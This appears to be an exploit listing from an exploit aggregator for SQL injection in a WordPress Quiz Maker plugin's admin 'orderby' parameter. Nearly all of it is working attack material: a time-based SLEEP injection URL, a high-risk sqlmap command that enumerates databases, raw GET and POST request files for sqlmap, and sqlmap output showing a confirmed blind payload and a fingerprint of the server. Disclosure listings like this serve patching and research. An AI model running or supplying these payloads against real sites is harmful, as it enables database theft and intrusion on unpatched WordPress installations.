## https://sploitus.com/exploit?id=WPEX-ID:929AD37D-9CDB-4117-8CD3-CF7130A7C9D4
All the files in includes/lists/ were affected and the PoC below are just examples of them
https://example.com/wp-admin/admin.php?page=quiz-maker-question-categories&orderby=title%20AND%20(SELECT%206418%20FROM%20(SELECT(SLEEP(5)))PLuH)&order=asc
SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs
With r.txt is GET OR POST requests to sort quiz:
GET /wp-admin/admin.php?page=quiz-maker&orderby=id--&order=desc HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
OR :
POST /wp-admin/admin.php?page=quiz-maker HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Connection: close
Cookie: [admin+]
orderby=id--&order=desc&s=d&action=-1&paged=1&filterby-top=&action2=-1&filterby-bottom=
SQLMAP OUTPUT:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=quiz-maker&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0